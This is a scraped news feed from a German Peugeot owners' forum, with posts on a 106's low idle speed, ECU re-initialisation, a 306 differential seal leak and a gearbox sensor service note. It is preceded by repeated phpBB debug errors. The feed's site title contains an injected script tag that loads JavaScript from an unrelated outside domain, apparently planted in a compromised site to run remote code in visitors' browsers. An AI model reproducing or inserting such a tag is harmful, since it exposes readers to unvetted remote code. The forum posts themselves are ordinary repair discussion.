[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: forum_id
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: mode
[phpBB Debug] PHP Notice: in file [ROOT]/phpbb/feed/controller/feed.php on line 319: compact(): Undefined variable: topic_id
www.peugeotforum.de<script src="https://new2sportnews.com/peugeotforum.js"></script> ...die Informationsplattform für Peugeotfahrer 2023-01-28T22:57:43+01:00 https://www.peugeotforum.de/forum/app.php/feed 2023-01-28T22:57:43+01:00 2023-01-28T22:57:43+01:00 https://www.peugeotforum.de/forum/viewtopic.php?t=133010&p=896491#p896491 <![CDATA[Allgemeines Forum • Re: Leerlauf zu niedrig 106]]> Interessanterweise ändert sich der Wert (Parametermessung bei laufendem Motor) auch, wenn man das Regelventil absteckt.
Durch folgenden Trick lässt sich die Sache überlisten: Wenn man die Heckscheibenheizung einschaltet (alles immer im Leerlauf) sinkt die Motordrehzahl. Die Steuerung regelt gegen. Alles passt wieder. Dann zieht man das Regelventil ab (Stecker) und schaltet die Scheibenheizung aus. -> Leerlaufdrehzahl zu hoch. Motorsteuergerät will Gegenregeln (tut es auch, der Tester zeigt eine kleinerwerdende Schrittzahl an) wenn man dann bei 20 Schritten ist, stecke ich das Ventil wieder an. Dann läuft alles wie es soll, (super Standgas fährt normal) allerdings nur bis zum nächsten Mal Zündung aus. Dann hat man wieder das gleiche Problem. Das heißt für mich, dass es keine dauerhafte Rückmeldung vom Regelventil gibt, in welcher Position es gerade ist, sondern das Steuergerät nur die Steuerimpulse von einem Referenzwert aus zählt. Dieser Referenzwert wird anscheinend bei jedem Motorstart abgefragt und muss fehlerhaft sein. Daher schließe ich auf defektes Regelventil. Wenns das nicht ist, kann ich es mir tatsächlich nicht erklären.
Jetzt muss ich wohl doch auf ein neues Regelventil warten...

Statistik: Verfasst von Wasserlöwe — Sa 28.01.23 22:57


]]>
2023-01-28T22:46:56+01:00 2023-01-28T22:46:56+01:00 https://www.peugeotforum.de/forum/viewtopic.php?t=133007&p=896490#p896490 <![CDATA[Allgemeines Forum • Re: Peugeot 106 II, 2001, 1,1 i, 60 PS, Benzinpumpe ohne Strom]]> .

Rockefeller-Prinzip. Verkaufe etwas Wartungsintenives oder Verbrauchsnotwendiges billig und biete die speziellen Servicestelle dazu für gutes Geld😲. Wie bei Tintenstrahldruckern.

Eine kurze Steuerkette und Stößelstangen halten oft ein Motorleben lang. Eine OHC-Steuerkette mit automatischem Spanner auch.

Mein 1200er 52/58-PS-Skoda-Oldie von 1980 hat Stößelstangen; wozu Zahnriemen😦? Und er hat weder Sekundärluftpumpe noch Einspritzschalgerät. Relais hat auch keins, nur einen Blinkgeber und einen mechanischen Laderegler👍😁.

Klar, Abgasbestimmungen machten das alles komplizierter, doch einiges ist wohl eher Mode, Rockefellerart und/oder überflüssig.

Tja, und von so einer Sekundärluftpumpe im 106er wusste ich noch gar nicht. Hoffe sie o.k. Ist Sie, wenn defekt, AU- relevant?

Heute kam ich beim 106er noch nicht weit; baue auf morgen😊

Gruß Joachim🤠

Statistik: Verfasst von xrv850 — Sa 28.01.23 22:46


]]>
2023-01-28T21:57:41+01:00 2023-01-28T21:57:41+01:00 https://www.peugeotforum.de/forum/viewtopic.php?t=133010&p=896489#p896489 <![CDATA[Allgemeines Forum • Re: Leerlauf zu niedrig 106]]> Statistik: Verfasst von HolleBln — Sa 28.01.23 21:57


]]>
2023-01-28T18:25:38+01:00 2023-01-28T18:25:38+01:00 https://www.peugeotforum.de/forum/viewtopic.php?t=133011&p=896488#p896488 <![CDATA[Allgemeines Forum • Re: Peugeot 306 Wellendichtring Differenzial]]> Jetzt wieder undicht - Garantie...

Gruss

Obelix

Statistik: Verfasst von obelix — Sa 28.01.23 18:25


]]>
2023-01-28T17:33:22+01:00 2023-01-28T17:33:22+01:00 https://www.peugeotforum.de/forum/viewtopic.php?t=133010&p=896487#p896487 <![CDATA[Allgemeines Forum • Re: Leerlauf zu niedrig 106]]> Unterdruckschläuche sind auch dran und dicht. Kann es doch sein, dass der Stellmotor selber einen weg hat?

Statistik: Verfasst von Wasserlöwe — Sa 28.01.23 17:33


]]>
2023-01-28T17:28:02+01:00 2023-01-28T17:28:02+01:00 https://www.peugeotforum.de/forum/viewtopic.php?t=133011&p=896486#p896486 <![CDATA[Allgemeines Forum • Peugeot 306 Wellendichtring Differenzial]]> ich habe eine Nachfrage.....
Peugeot 306 Cabrio 2002 7LFY 81kw/110Ps 1761cm³

Ende Oktober 2022 wurden in der Werkstatt die Antriebswellen erneuert. Neu kamen auch die Wellendichtringe links und Rechts.
Jetzt leckt es .... die (gleiche) Werkstatt sagt, das käme von den Dichtwellen für das Differenzial...

Sind es wirklich andere Dichtringe ?

Danke für die Mühe Bibo

Statistik: Verfasst von bibo — Sa 28.01.23 17:28


]]>
2023-01-28T16:10:39+01:00 2023-01-28T16:10:39+01:00 https://www.peugeotforum.de/forum/viewtopic.php?t=133010&p=896485#p896485 <![CDATA[Allgemeines Forum • Re: Leerlauf zu niedrig 106]]> wenn ja:
Initialisieren ist ein guter Ansatz.
Magnetti Marelli :
Zündung ein, 10 Sekunden warten, Motor starten ohne Gaspedal zu treten, Motor laufen lassen bis Lüftermotor anspringt (keine Gasbetätigung dabei durchführen), wenn Gebläsemotor anspringt - Zündung aus - Plus und Minuspol der Batterie abklemmen, Pluskabel und Minuspolkabel für 10 sek. übereinanderlegen-/verbinden, Plus und Minuspol wieder anbauen, Zündung ein, 10 Sekunden warten, Motor starten ohne Gaspedal zu treten,
Initialisierung abgeschlossen
ausprobieren

Statistik: Verfasst von Emma65 — Sa 28.01.23 16:10


]]>
2023-01-28T15:57:01+01:00 2023-01-28T15:57:01+01:00 https://www.peugeotforum.de/forum/viewtopic.php?t=133005&p=896484#p896484 <![CDATA[Allgemeines Forum • Re: Halbautomatik Anzeige springt]]> Elektromagnetische Störungen, die mit der Stop and Start(STT)-Funktion verbunden sind und durch ein am Getriebe befestigtes Massekabel verbreitet werden.
HINWEIS : Diese Störungen beeinträchtigen die Werte des Sensors der Primärwelle des Getriebes

KUNDENDIENSTEINGRIFF
Neuausrichtung des Massekabels am Getriebe.

HINWEIS : Ziel ist es, das Massekabel des Sensors der Primärwelle des Getriebes zu entfernen

Benötigte Teile
1 Stiftschraube (ET-Nummer 2210.31).
1 Unterlegscheibe (ET-Nummer 6949.27).
1 Mutter (ET-Nummer 79 03 233 043).

Eine Abfrage der Fehlercodes durchführen :
Bei Vorliegen des Fehlercodes P1705 : Dieses Dokument anwenden
Wenn der Fehlercode P1705 nicht vorliegt : Dieses Dokument anwenden

Maßnahme
3.png

2.png

1.png

Statistik: Verfasst von Emma65 — Sa 28.01.23 15:57


]]>
2023-01-28T14:56:53+01:00 2023-01-28T14:56:53+01:00 https://www.peugeotforum.de/forum/viewtopic.php?t=133010&p=896483#p896483 <![CDATA[Allgemeines Forum • Leerlauf zu niedrig 106]]> Leider ärgert mich mein kleiner Löwe (106 1995 1.1 60Ps (HDZ) Magnetti Marelli )
Der Leerlauf ist deutlich zu niedrig. (Ca. 500 U/min) Wenn man ihm 5sek Zeit gibt, regelt er nach und alles passt. Wenn man wieder einen Gasstoß gibt, oder kurz fährt, sackt er im Leerlauf wieder runter, und regelt dann nach.
Ich habe mit Hilfe des Tep 92 eine Fehlerlöschung durchgeführt (war nix hinterlegt) das hat aber nicht geholfen. Daraufhin den Leerlaufsteller gereinigt, brachte auch keine Besserung.
Wenn man bei laufendem Motor die Parameter ausliest, hat er bei 50 Schritten (Leerlaufsteller) einen guten Leerlauf. Nach kurzem Gasgeben macht der aber wieder auf circa 20 Schritte zu und die Drehzahl ist im Keller. Bis er nach wenigen Sekunden nachregelt. D.h. der Stellmotor arbeitet wie er soll. Fragt sich nur, warum das Steuergerät immer das Signal zum Schließen gibt… Die anderen Werte (Pedalstellung, Luft- Wassertemperatur, Luftdruck, Drehzahl, Lambda) sind alle plausibel.
Wenn ich die Fehlerlöschung durchgeführt habe, heißt es, dass ich das Steuergerät neu Initialisieren soll. Allerdings weiß ich nicht, wie das geht. Vielleicht könnt ihr mir helfen oder habt noch eine andere Idee zur Fehlerursache.

Liebe Grüße
Johannes

Statistik: Verfasst von Wasserlöwe — Sa 28.01.23 14:56


]]>
2023-01-28T14:46:49+01:00 2023-01-28T14:46:49+01:00 https://www.peugeotforum.de/forum/viewtopic.php?t=132974&p=896482#p896482 <![CDATA[Allgemeines Forum • Re: Klappern Vorderachse 106]]> Danke für die Antwort!

Statistik: Verfasst von Wasserlöwe — Sa 28.01.23 14:46


]]>